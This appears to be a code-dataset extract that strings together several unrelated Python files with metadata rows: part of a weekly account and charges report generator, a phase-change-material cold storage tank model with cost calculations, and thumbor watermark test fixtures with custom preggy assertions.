html += f"""<th style="text-align: center; border: 1px solid black; padding: 4px">{column_name}</th>"""
account_worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += "</tr>\n"
# Get row data
addl_cols = ["percent_credits_used", "remaining_credits"]
rows = get_account_data(
es_client, account=account, addl_cols=addl_cols, index=account_index
)
if len(rows) == 0:
raise ValueError(f"No account {account} found in index {index}.")
if len(rows) > 1:
raise ValueError(
f"Multiple accounts found for account id {account} in index {index}."
)
row = rows[0]
# Write this week's snapshot file
snapshot_directory = snapshot_directory / account
snapshot_directory.mkdir(parents=True, exist_ok=True)
snapshot_file = snapshot_directory / f"cas-weekly-account-report_{date_str}.json"
with open(snapshot_file, "w") as f:
json.dump(row, f, indent=2)
# Add row data to html and xlsx
i_row = 1
html += """<tr>\n"""
for i_col, col in enumerate(account_columns):
val = row[col]
if col == "percent_credits_used":
html += f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{val:.1%}</td>"""
account_worksheet.write(i_row, i_col, val, xlsx_percent_fmt)
else:
html += col_style(val)
try:
account_worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
account_worksheet.write(i_row, i_col, val)
html += """</tr>\n"""
# Read from snapshot if available
last_date_str = str(starting_week_date - timedelta(days=7))
last_snapshot_file = (
snapshot_directory / f"cas-weekly-account-report_{last_date_str}.json"
)
if last_snapshot_file.exists():
with last_snapshot_file.open() as f:
last_row = json.load(f)
# Add row data to html and xlsx
i_row = 2
html += """<tr>\n"""
merge_to_col = list(account_columns.keys()).index("total_credits")
for i_col, col in enumerate(account_columns):
if not (i_col == 0 or col in {"total_credits", "total_charges"}):
if i_col > merge_to_col:
html += """<td style="border-style: none"></td>"""
elif i_col == 0:
val = "Change since last report"
html += f"""<td style="text-align: left; border-style: none; padding: 4px" colspan="{merge_to_col}">{val}</td>"""
# merge_range requires the cell data as its fifth argument
account_worksheet.merge_range(i_row, i_col, i_row, merge_to_col, val)
else:
val = row[col] - last_row[col]
html += f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{val:+,.1f}</td>"""
account_worksheet.write(i_row, i_col, val, xlsx_delta_fmt)
html += """</tr>\n"""
html += """</table>\n"""
# Now create the charges report
charge_columns = OrderedDict()
charge_columns["date"] = "Date"
charge_columns["user_id"] = "User"
charge_columns["resource_name"] = "Resource"
charge_columns["total_charges"] = "Charges"
charges_worksheet = workbook.add_worksheet("Charges summary")
html += """<h1>Last week's charges</h1>
<table style="border-collapse: collapse">\n"""
# Write header
i_row = 0
html += f"""<tr>\n"""
for i_col, (column_id, column_name) in enumerate(charge_columns.items()):
html += f"""<th style="text-align: center; border: 1px solid black; padding: 4px">{column_name}</th>"""
charges_worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += """</tr>\n"""
# Get row data
rows = get_charge_data(
es_client,
start_date=starting_week_date,
end_date=starting_week_date + timedelta(days=7),
account=account,
index=charge_index,
)
rows.sort(key=itemgetter("date", "user_id", "resource_name"))
# Add row data to html and xlsx
for i_row, row in enumerate(rows, start=1):
html += f"""<tr style="{row_style(i_row)}">\n"""
for i_col, col in enumerate(charge_columns):
val = row[col]
html += col_style(val)
try:
charges_worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
charges_worksheet.write(i_row, i_col, val)
html += """</tr>\n"""
html += """</table>\n"""
html += """</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
# Add monthly NSF report
def generate_monthly_agency_report(
es_client,
account,
starting_month_date,
xlsx_directory=Path("./monthly_agency_reports"),
index="cas-credit-accounts",
):
date_str = str(starting_month_date)
xlsx_directory = xlsx_directory / account
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"path-cas-monthly-agency-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
<table style="border-collapse: collapse">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
worksheet = workbook.add_worksheet()
# Create table
html += """</table>
</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
| 34.860526 | 129 | 0.614328 | 1,706 | 13,247 | 4.564478 | 0.141266 | 0.012328 | 0.008989 | 0.014383 | 0.598433 | 0.542186 | 0.507513 | 0.48337 | 0.463208 | 0.437909 | 0 | 0.006695 | 0.244584 | 13,247 | 379 | 130 | 34.952507 | 0.77146 | 0.039783 | 0 | 0.425806 | 0 | 0.029032 | 0.265737 | 0.058851 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025806 | false | 0 | 0.045161 | 0 | 0.109677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12f0de2573c638981e43ff0b8def9aea95aeba7 | 24,481 | py | Python | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | cea/technologies/storage_tank_pcm.py | architecture-building-systems/cea-toolbox | bfec7ecb4b242449ab8796a1e8ce68c05c35f1d6 | [
"MIT"
] | null | null | null | """
Water / Ice / PCM short-term thermal storage (for daily operation)
"""
import numpy as np
from cea.technologies.storage_tank import calc_tank_surface_area, calc_cold_tank_heat_gain
from math import log
from cea.analysis.costs.equations import calc_capex_annualized
__author__ = "Jimeno Fonseca"
__copyright__ = "Copyright 2021, Cooling Singapore"
__credits__ = ["Jimeno Fonseca, Mathias Niffeler"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "NA"
__email__ = "jimeno.fonseca@ebp.ch"
__status__ = "Production"
class Storage_tank_PCM(object):
def __init__(self, size_Wh:float, database_model_parameters, T_ambient_K:float,
type_storage:str, activation=True, debug=False):
# INITIALIZING THE CLASS
self.hour = 0 # this is just to track when the storage is being run.
self.debug = debug # this is to show extra messages and debug the code easily
self.activated = activation # It is a boolean and indicates if the storage is on or off (True or False)
self.hour_of_last_activation = 0 # this is to make sure passive thermal gains are accounted for correctly.
self.size_Wh = size_Wh # It is a float and it is the size of the storage in Wh
self.T_ambient_K = T_ambient_K # temperature outside the tank used to calculate thermal losses (K)
self.type_storage = type_storage # code which refers to the type of storage to be used from the conversion database
# INITIALIZING MODEL PARAMETERS FROM DATABASE OF CONVERSION TECHNOLOGIES / TES
self.storage_prop = database_model_parameters[database_model_parameters['code'] == type_storage]
self.description = self.storage_prop['Description'].values[0]
self.T_phase_change_K = self.storage_prop['T_PHCH_C'].values[0] + 273.0
self.T_tank_fully_charged_K = self.storage_prop['T_min_C'].values[0] + 273.0
self.T_tank_fully_discharged_K = self.storage_prop['T_max_C'].values[0] + 273.0
self.latent_heat_phase_change_kJ_kg = self.storage_prop['HL_kJkg'].values[0]
self.density_phase_change_kg_m3 = self.storage_prop['Rho_T_PHCH_kgm3'].values[0]
self.specific_heat_capacity_solid_kJ_kgK = self.storage_prop['Cp_kJkgK'].values[0]
self.specific_heat_capacity_liquid_kJ_kgK = self.storage_prop['Cp_kJkgK'].values[0]
self.charging_efficiency = self.storage_prop['n_ch'].values[0]
self.discharging_efficiency = self.storage_prop['n_disch'].values[0]
# INITIALIZE OTHER PHYSICAL PROPERTIES NEEDED THROUGH THE SCRIPT
self.AT_solid_to_phase_K = self.T_phase_change_K - self.T_tank_fully_charged_K
self.AT_phase_to_liquid_K = self.T_tank_fully_discharged_K - self.T_phase_change_K
self.mass_storage_max_kg = calc_storage_tank_mass(self.size_Wh,
self.AT_solid_to_phase_K,
self.AT_phase_to_liquid_K,
self.latent_heat_phase_change_kJ_kg,
self.specific_heat_capacity_liquid_kJ_kgK,
self.specific_heat_capacity_solid_kJ_kgK)
self.V_tank_m3 = self.mass_storage_max_kg / self.density_phase_change_kg_m3
self.Area_tank_surface_m2 = calc_tank_surface_area(self.V_tank_m3)
self.cap_phase_change_Wh = self.mass_storage_max_kg * self.latent_heat_phase_change_kJ_kg / 3.6
self.cap_solid_phase_Wh = self.mass_storage_max_kg * self.specific_heat_capacity_solid_kJ_kgK * self.AT_solid_to_phase_K / 3.6
self.cap_liquid_phase_Wh = self.mass_storage_max_kg * self.specific_heat_capacity_liquid_kJ_kgK * self.AT_phase_to_liquid_K / 3.6
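# By construction of mass_storage_max_kg, these three capacity segments
# (sensible cooling of the solid, latent heat of the phase change, and
# sensible cooling of the liquid) sum back to exactly size_Wh.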
# initialize variables and properties (empty storage)
self.T_tank_K = self.T_tank_fully_discharged_K
self.current_phase = 1 # "1=liquid, 2=phasechange, 3=solid"
self.current_storage_capacity_Wh = 0.0
self.hourly_thermal_gain_Wh = 0.0
self.current_thermal_gain_Wh = 0.0
if self.debug:
print("...initializing the storage...")
print("The type of storage is a {}".format(self.description))
print("The volume and mass of the Storage is {:.2f} m3 and {:.2f} ton".format(self.V_tank_m3,
self.mass_storage_max_kg / 1000))
print(
"The storage capacity at solid, phase change, and liquid phase are {:.2f} kWh, {:.2f} kWh, and {:.2f} kWh".format(
self.cap_solid_phase_Wh/ 1000, self.cap_phase_change_Wh/ 1000, self.cap_liquid_phase_Wh/ 1000))
print(
"The minimum, phase change, and maximum Temperatures of the storaage are {:.2f} °C, {:.2f} °C, and {:.2f} °C".format(
self.T_tank_fully_charged_K - 273, self.T_phase_change_K - 273, self.T_tank_fully_discharged_K - 273))
print("...initialization of the storage finished...")
def balance_storage(self):
"""
The aim of this function is to calculate the new state of the storage if it was not charged or discharged.
So pretty much we factor in the thermal gain when the storage remains idle.
"""
if self.activated:
if self.debug:
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
new_storage_capacity_wh = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
new_phase = self.new_phase_tank(new_storage_capacity_wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_wh, self.current_thermal_gain_Wh) # Since the third argument is the "load difference", thermal gains should be input as negative load differences TODO: Check this with Jimeno
new_thermal_loss_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_thermal_loss_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return self.current_storage_capacity_Wh
def new_phase_tank(self, new_storage_capacity_wh):
tol = 0.000001
# case 1: the storage tank is in liquid change
if 0.0 <= new_storage_capacity_wh <= self.cap_liquid_phase_Wh:
new_phase = 1
# case 2: the storage tank is in phase change
elif self.cap_liquid_phase_Wh < new_storage_capacity_wh <= (self.cap_liquid_phase_Wh + self.cap_phase_change_Wh):
new_phase = 2
# case 3: the storage tank is in the solid phase
elif (self.cap_liquid_phase_Wh + self.cap_phase_change_Wh) < new_storage_capacity_wh <= (
self.cap_liquid_phase_Wh + self.cap_phase_change_Wh + self.cap_solid_phase_Wh + tol):
new_phase = 3
else:
print("there was an error, the new capacity was {} and the thermal loss was {}".format(new_storage_capacity_wh, self.current_thermal_gain_Wh))
return new_phase
def new_temperature_tank(self, new_phase, new_storage_capacity_wh, heat_gain_Wh):
T0 = self.T_tank_K
m = self.mass_storage_max_kg
Cp_l = self.specific_heat_capacity_liquid_kJ_kgK
Cp_s = self.specific_heat_capacity_solid_kJ_kgK
current_phase = self.current_phase
if current_phase == 1 and new_phase == 1:
if self.debug:
print("liquid phase is maintained")
Tb = T0
T1 = Tb + (heat_gain_Wh * 3.6) / (m * Cp_l)
elif current_phase == 2 and new_phase == 2:
if self.debug:
print("phase change is maintained")
T1 = self.T_phase_change_K
elif current_phase == 3 and new_phase == 3:
if self.debug:
print("solid phase is maintained")
Tb = T0
T1 = Tb + (heat_gain_Wh * 3.6) / (m * Cp_s)
elif current_phase == 1 and new_phase == 2: # moving from liquid to phase # charging
if self.debug:
print("moving from liquid to phase change")
T1 = self.T_phase_change_K
elif current_phase == 2 and new_phase == 3: # moving from phase to solid # charging
if self.debug:
print("moving from phase to solid phase")
Tb = self.T_phase_change_K
T1 = Tb - ((self.cap_solid_phase_Wh - (self.size_Wh - new_storage_capacity_wh)) * 3.6) / (m * Cp_s)
elif current_phase == 1 and new_phase == 3: # moving from liquid to solid # charging
if self.debug:
print("moving from liquid to solid phase")
Tb = self.T_phase_change_K
T1 = Tb - ((self.cap_solid_phase_Wh - (self.size_Wh - new_storage_capacity_wh)) * 3.6) / (m * Cp_s)
elif current_phase == 3 and new_phase == 2: # moving from solid to phase # discharging
if self.debug:
print("moving from solid to phase change")
T1 = self.T_phase_change_K
elif current_phase == 2 and new_phase == 1: # moving from phase to liquid # discharging
if self.debug:
print("moving from phase change to liquid phase")
Tb = self.T_phase_change_K
T1 = Tb + ((self.cap_liquid_phase_Wh - new_storage_capacity_wh) * 3.6) / (m * Cp_l)
elif current_phase == 3 and new_phase == 1: # moving from solid to liquid # discharging
if self.debug:
print("moving from solid to liquid change")
Tb = self.T_phase_change_K
T1 = Tb + ((self.cap_liquid_phase_Wh - new_storage_capacity_wh) * 3.6) / (m * Cp_l)
if np.isnan(T1):
print("error at hour {}".format(self.hour))
return T1
def charge_storage(self, load_to_storage_Wh):
if self.activated:
# calculate passive thermal gain since last activation
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
if self.debug:
print("...charging...")
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
print("The requested load was {:.2f} kW".format(
load_to_storage_Wh / 1000))
print("The current thermal gain is {:.2f} kW".format(
self.current_thermal_gain_Wh / 1000))
# factor the efficiency of the exchange in
effective_load_to_storage_Wh = load_to_storage_Wh * self.charging_efficiency
# discount the thermal gain due to a hotter environment
state_the_storage_after_thermal_gain = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
if state_the_storage_after_thermal_gain <= 0.0: # check so we do not get negative storage capacities.
state_the_storage_after_thermal_gain = 0.0
# CASE 1 the storage is empty:
if state_the_storage_after_thermal_gain == 0.0:
# CASE 1.1 the effective load is bigger than the capacity of the storage
if effective_load_to_storage_Wh >= self.size_Wh:
effective_load_to_storage_Wh = self.size_Wh
new_storage_capacity_Wh = self.size_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 1.2 the effective load is smaller than the capacity of the storage
elif effective_load_to_storage_Wh < self.size_Wh:
new_storage_capacity_Wh = effective_load_to_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 2 the storage is partially full or full
elif 0.0 < state_the_storage_after_thermal_gain <= self.size_Wh:
# CASE 2.1 the effective load + the storage capacity now is bigger than the total capacity
if (state_the_storage_after_thermal_gain + effective_load_to_storage_Wh) >= self.size_Wh:
effective_load_to_storage_Wh = self.size_Wh - state_the_storage_after_thermal_gain
new_storage_capacity_Wh = self.size_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# CASE 2.2 the effective load + the storage capacity now is lower than the total capacity
elif (state_the_storage_after_thermal_gain + effective_load_to_storage_Wh) < self.size_Wh:
effective_load_to_storage_Wh = effective_load_to_storage_Wh
new_storage_capacity_Wh = state_the_storage_after_thermal_gain + effective_load_to_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh - effective_load_to_storage_Wh)
# recalculate the storage capacity after losses
final_load_to_storage_Wh = effective_load_to_storage_Wh / self.charging_efficiency
new_hourly_thermal_gain_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_hourly_thermal_gain_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_Wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The possible load was {:.2f} kWh".format(final_load_to_storage_Wh / 1000))
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return final_load_to_storage_Wh, new_storage_capacity_Wh
else:
return 0.0, 0.0
def discharge_storage(self, load_from_storage_Wh):
if self.activated:
# calculate passive thermal gain since last activation
self.current_thermal_gain_Wh = self.hourly_thermal_gain_Wh * (self.hour - self.hour_of_last_activation)
if self.debug:
print("...discharging...")
print("The current capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273))
print("The requested load was {:.2f} kW".format(
load_from_storage_Wh / 1000))
print("The current thermal gain is {:.2f} kW".format(
self.current_thermal_gain_Wh / 1000))
# factor in the efficiency of discharge
effective_load_from_storage_Wh = load_from_storage_Wh / self.discharging_efficiency
# discount the thermal gain due to a hotter environment
state_the_storage_after_thermal_gain = self.current_storage_capacity_Wh - self.current_thermal_gain_Wh
if state_the_storage_after_thermal_gain <= 0.0: # check so we do not get negative storage capacities.
state_the_storage_after_thermal_gain = 0.0
# CASE 1 the storage is empty:
if state_the_storage_after_thermal_gain == 0.0:
effective_load_from_storage_Wh = 0.0
new_storage_capacity_Wh = state_the_storage_after_thermal_gain
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, 0.0) # TODO: If the thermal gain is too high it can actually raise beyond the maximum Temperature. This case is not considered. There will be a need to Precool the storage?
# CASE 2 the storage is partially full or full:
elif 0.0 < state_the_storage_after_thermal_gain <= self.size_Wh:
# CASE 2.1 the request is too high and will go beyond emptying the storage
if (state_the_storage_after_thermal_gain - effective_load_from_storage_Wh) < 0.0:
effective_load_from_storage_Wh = state_the_storage_after_thermal_gain
new_storage_capacity_Wh = 0.0
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh + effective_load_from_storage_Wh)
# CASE 2.2 the request is just right and it will not empty the storage
elif (state_the_storage_after_thermal_gain - effective_load_from_storage_Wh) >= 0.0:
effective_load_from_storage_Wh = effective_load_from_storage_Wh
new_storage_capacity_Wh = state_the_storage_after_thermal_gain - effective_load_from_storage_Wh
new_phase = self.new_phase_tank(new_storage_capacity_Wh)
new_T_tank_K = self.new_temperature_tank(new_phase, new_storage_capacity_Wh, self.current_thermal_gain_Wh + effective_load_from_storage_Wh)
# recalculate the storage capacity after losses
final_load_from_storage_Wh = effective_load_from_storage_Wh * self.discharging_efficiency
new_hourly_thermal_gain_Wh = calc_cold_tank_heat_gain(self.Area_tank_surface_m2,
(new_T_tank_K + self.T_tank_K) / 2,
self.T_ambient_K)
# finally update all variables
self.current_phase = new_phase
self.hourly_thermal_gain_Wh = new_hourly_thermal_gain_Wh
self.T_tank_K = new_T_tank_K
self.current_storage_capacity_Wh = new_storage_capacity_Wh
self.hour_of_last_activation = self.hour
if self.debug:
print("The requested load to discharge was {:.2f} kW, the possible load to discharge was {:.2f} kWh".format(
load_from_storage_Wh / 1000, final_load_from_storage_Wh / 1000))
print("The new capacity and temperature is {:.2f} kWh, and {:.2f} °C".format(
self.current_storage_capacity_Wh / 1000, self.T_tank_K - 273, ))
return final_load_from_storage_Wh, new_storage_capacity_Wh
else:
return 0.0, 0.0
def costs_storage(self):
if self.activated:
capacity_kWh = self.size_Wh / 1000
if capacity_kWh > 0.0:
storage_cost_data = self.storage_prop
# if the Q_design is below the lowest capacity available for the technology, then it is replaced by
# the least capacity for the corresponding technology from the database
if capacity_kWh < storage_cost_data.iloc[0]['cap_min']:
capacity_kWh = storage_cost_data.iloc[0]['cap_min']
storage_cost_data = storage_cost_data[(storage_cost_data['cap_min'] <= capacity_kWh) & (storage_cost_data['cap_max'] > capacity_kWh)]
Inv_a = storage_cost_data.iloc[0]['a']
Inv_b = storage_cost_data.iloc[0]['b']
Inv_c = storage_cost_data.iloc[0]['c']
Inv_d = storage_cost_data.iloc[0]['d']
Inv_e = storage_cost_data.iloc[0]['e']
Inv_IR = storage_cost_data.iloc[0]['IR_%']
Inv_LT = storage_cost_data.iloc[0]['LT_yr']
Inv_mat_LT = storage_cost_data.iloc[0]['LT_mat_yr']
C_mat_LT = storage_cost_data.iloc[0]['C_mat_%'] / 100
Inv_OM = storage_cost_data.iloc[0]['O&M_%'] / 100
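# Investment cost curve: Capex_total = a + b*cap^c + (d + e*cap)*ln(cap),
# annualized over the equipment lifetime at interest rate IR, plus a second
# annualized term for periodic replacement of the storage material.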
Capex_total_USD = Inv_a + Inv_b * (capacity_kWh) ** Inv_c + (Inv_d + Inv_e * capacity_kWh) * log(capacity_kWh)
Capex_a_storage_USD = calc_capex_annualized(Capex_total_USD, Inv_IR, Inv_LT)
Capex_a_storage_USD += calc_capex_annualized(Capex_total_USD * C_mat_LT, Inv_IR, Inv_mat_LT)
Opex_fixed_storage_USD = Capex_total_USD * Inv_OM
else:
Capex_a_storage_USD = 0.0
Opex_fixed_storage_USD = 0.0
Capex_total_USD = 0.0
return Capex_a_storage_USD, Opex_fixed_storage_USD, Capex_total_USD
else:
return 0.0, 0.0, 0.0
def calc_storage_tank_mass(size_Wh,
AT_solid_to_phase_K,
AT_phase_to_liquid_K,
latent_heat_phase_change_kJ_kg,
specific_heat_capacity_liquid_kJ_kgK,
specific_heat_capacity_solid_kJ_kgK):
mass_kg = size_Wh * 3.6 / (specific_heat_capacity_solid_kJ_kgK * AT_solid_to_phase_K +
specific_heat_capacity_liquid_kJ_kgK * AT_phase_to_liquid_K +
latent_heat_phase_change_kJ_kg)
return mass_kg
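# Worked example (hypothetical property values, not from the database):
# with Cp_solid = Cp_liquid = 2.0 kJ/kgK, both temperature deltas at 5 K and
# a latent heat of 300 kJ/kg, a 100 kWh tank needs
# 100000 * 3.6 / (2*5 + 2*5 + 300) = 1125 kg of storage material.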
if __name__ == '__main__':
##### TEST ######
import plotly.graph_objs as go
from cea.plots.variable_naming import COLOR, NAMING
# select one tank to test
type_storage = "TES6"
# test tank based on unittests (check the unittests to see how this works)
from cea.tests.test_technologies import TestColdPcmThermalStorage
test = TestColdPcmThermalStorage()
TestColdPcmThermalStorage.setUpClass()
test.type_storage = type_storage
# the test returns a) the results of the checks, b) the data, and c) a description of the tank.
# the first verifies the expected behaviour; b) and c) are used to make the plot below.
results, data, description = test.test_cold_pcm_thermal_storage(checkResults=True)
print(results)
# here is the second test about volume and costs of the storage
results = test.test_cold_pcm_thermal_storage_costs(checkResults=True)
print(results)
# plot results
analysis_fields = ["Q_DailyStorage_gen_directload_W", "Q_DailyStorage_to_storage_W"]
traces = []
fig = go.Figure()
for field in analysis_fields:
y = data[field].values / 1E3 # to kWh
name = NAMING[field]
fig.add_trace(go.Bar(x=data.index, y=y, name=name, marker=dict(color=COLOR[field]), yaxis='y'))
fig.add_trace(go.Line(x=data.index, y=data["Q_DailyStorage_content_W"] / 1000, yaxis='y', name=NAMING["Q_DailyStorage_content_W"], line_shape='spline'))
fig.add_trace(go.Line(x=data.index, y=data["T_DailyStorage_C"], yaxis='y2', name=NAMING["T_DailyStorage_C"], line_shape='spline'))
fig.update_layout(title=description,
yaxis=dict(title='Load [kWh]'),
yaxis2=dict(title='Tank Temperature [C]', overlaying='y', side='right', range=[-1, 14]))
fig.update_layout(legend=dict(
yanchor="top",
y=0.99,
xanchor="left",
x=0.01
))
fig.show()
| 57.198598 | 266 | 0.644622 | 3,399 | 24,481 | 4.26449 | 0.109444 | 0.060021 | 0.062159 | 0.053812 | 0.669127 | 0.61435 | 0.566747 | 0.5188 | 0.495274 | 0.445257 | 0 | 0.019764 | 0.282832 | 24,481 | 427 | 267 | 57.332553 | 0.80532 | 0.137658 | 0 | 0.350158 | 0 | 0.009464 | 0.090095 | 0.006048 | 0 | 0 | 0 | 0.002342 | 0 | 1 | 0.025237 | false | 0 | 0.022082 | 0 | 0.082019 | 0.104101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12f8da3310c8830d23fe7b1dede9ec6e95c6006 | 2,428 | py | Python | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 6,837 | 2015-01-01T14:33:12.000Z | 2022-03-31T22:21:05.000Z | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 1,055 | 2015-01-03T22:22:05.000Z | 2022-03-31T21:56:17.000Z | tests/fixtures/watermark_fixtures.py | dynamicguy/thumbor | 4e69ec6289ef549109cdfc72bf765b9dc62f9763 | [
"MIT"
] | 744 | 2015-01-05T03:49:31.000Z | 2022-03-30T02:35:16.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/thumbor/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com thumbor@googlegroups.com
import preggy
POSITIONS = [
# length (either width or height), position in percent, expected string
(800, "-20p", "-160"),
(800, "30p", "240"),
(800, "230p", "1840"),
(50, "37p", "19"),
(55, "53p", "29"),
(55, "-53p", "-29"),
(800, "center", "center"),
(800, "30", "30"),
(800, "-40", "-40"),
(800, "repeat", "repeat"),
]
SOURCE_IMAGE_SIZES = [
(800, 600),
(600, 600),
(600, 800),
]
WATERMARK_IMAGE_SIZES = [
# bigger ones
(1200, 900),
(900, 900),
(900, 1200),
# one size bigger
(1200, 500),
(700, 400),
(400, 700),
# equal
(800, 600),
(600, 600),
# smaller
(500, 300),
(300, 300),
(300, 500),
]
RATIOS = [
# only X
(300, None),
(200, None),
(100, None),
(50, None),
(25, None),
# only Y
(None, 300),
(None, 200),
(None, 100),
(None, 50),
(None, 25),
# X and Y
(300, 300),
(200, 200),
(100, 100),
(50, 50),
(25, 25),
(300, 25),
(300, 50),
(300, 100),
(300, 200),
(25, 300),
(50, 300),
(100, 300),
(200, 300),
(25, 50),
(50, 25),
]
@preggy.assertion
def to_fit_into(topic, boundary, **kwargs):
assert (
topic <= boundary
), "Expected topic({topic}) to fit into boundary {boundary} with test: {test}".format(
topic=topic, boundary=boundary, test=kwargs
)
@preggy.assertion
def to_be_true_with_additional_info(topic, **kwargs):
assert topic, "Expected topic to be true with test: {test}".format(test=kwargs)
@preggy.assertion
def to_be_equal_with_additional_info(topic, expected, **kwargs):
assert (
topic == expected
), "Expected topic({topic}) to be ({expected}) with test: {test}".format(
topic=topic, expected=expected, test=kwargs
)
@preggy.assertion
def to_almost_equal(topic, expected, differ, **kwargs):
assert abs(1 - topic / expected) <= (differ / 100.0), (
"Expected topic({topic}) to be almost equal expected"
"({expected}) differing only in {percent}% with test: {test}"
).format(topic=topic, expected=expected, test=kwargs, percent=differ)
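# Usage sketch (illustrative): preggy exposes the assertions above on
# expect(), so a test can write, for example,
#     from preggy import expect
#     expect(790).to_fit_into(800, watermark=(800, 600))
#     expect(1.98).to_almost_equal(2.0, 5, ratio="30p")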
| 21.486726 | 90 | 0.562191 | 305 | 2,428 | 4.416393 | 0.347541 | 0.067558 | 0.053452 | 0.059391 | 0.267261 | 0.234595 | 0.198961 | 0.123237 | 0.123237 | 0.080178 | 0 | 0.145765 | 0.251236 | 2,428 | 112 | 91 | 21.678571 | 0.59516 | 0.151977 | 0 | 0.148148 | 0 | 0 | 0.175636 | 0 | 0 | 0 | 0 | 0 | 0.098765 | 1 | 0.049383 | false | 0 | 0.012346 | 0 | 0.061728 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12fca9ac4610e1cb1ad72805e91521f0a7f4dec | 17,301 | py | Python | SP2000/sp2000.py | ynulihao/SP2000 | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
"MIT"
] | 6 | 2020-06-01T11:26:15.000Z | 2020-07-09T01:02:20.000Z | SP2000/sp2000.py | ynulihao/SP2000_python | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
"MIT"
] | null | null | null | SP2000/sp2000.py | ynulihao/SP2000_python | b1ab57b8f6f9c69b0612a02e033c9ae190f50faf | [
